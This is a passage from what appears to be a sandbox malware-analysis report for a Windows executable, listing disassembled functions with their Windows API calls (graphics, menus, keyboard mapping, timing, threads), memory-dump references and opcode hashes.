                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3275902921-0
                                                                                                                                                                  • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                                                                  • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                                                                                                  • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                                                                  • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                                                                                                  Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2833360925-0
                                                                                                                                                                  • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                                                                  • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                                                                                                  • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                                                                  • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                                                                                                  Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32 ref: 004555C7
                                                                                                                                                                  • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3691411573-0
                                                                                                                                                                  • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                                                                                  • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                                                                                                                  • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                                                                                                                  Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                                                                                  • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                                                                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                                                                                  • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                                                                                  • EndPath.GDI32(?), ref: 004472D6
                                                                                                                                                                  • StrokePath.GDI32(?), ref: 004472E4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 372113273-0
                                                                                                                                                                  • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                                                                  • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                                                                                                  • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                                                                  • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                                                                                                  Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CapsDevice$Release
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1035833867-0
                                                                                                                                                                  • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                                                                  • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                                                                                                  • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                                                                  • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                                                                                                  Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                                                                                  • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                                                                                    • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3495660284-0
                                                                                                                                                                  • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                                                                  • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                                                                                                  • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                                                                  • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                                                                                                  Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Virtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4278518827-0
                                                                                                                                                                  • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                                                                  • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                                                                                                  • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                                                                  • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                                                                                                  Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                  • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                                                                                  • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$AttributesFile
                                                                                                                                                                  • String ID: \VH
                                                                                                                                                                  • API String ID: 751036072-234962358
                                                                                                                                                                  • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                                                                  • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                                                                                                  • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                                                                  • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                                                                                                  Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                                                                                                  • IsMenu.USER32(?), ref: 0044854D
                                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                                                                                                  • DrawMenuBar.USER32 ref: 004485AF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 3076010158-4108050209
                                                                                                                                                                  • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                                                                  • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                                                                                                  • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                                                                  • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                                                                                                  Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                                                                                                  • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                  • API String ID: 3850602802-1403004172
                                                                                                                                                                  • Opcode ID: b2f6c81cb5893e82bf535347fa7293d1c6abf3951e893cfe36b26892c901a961
                                                                                                                                                                  • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                                                                                                  • Opcode Fuzzy Hash: b2f6c81cb5893e82bf535347fa7293d1c6abf3951e893cfe36b26892c901a961
                                                                                                                                                                  • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                                                                                                  Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Handle
                                                                                                                                                                  • String ID: nul
                                                                                                                                                                  • API String ID: 2519475695-2873401336
                                                                                                                                                                  • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                                                                  • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                                                                                                  • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                                                                  • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                                                                                                  Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Handle
                                                                                                                                                                  • String ID: nul
                                                                                                                                                                  • API String ID: 2519475695-2873401336
                                                                                                                                                                  • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                                                                  • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                                                                                                  • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                                                                  • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                                                                                                  Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
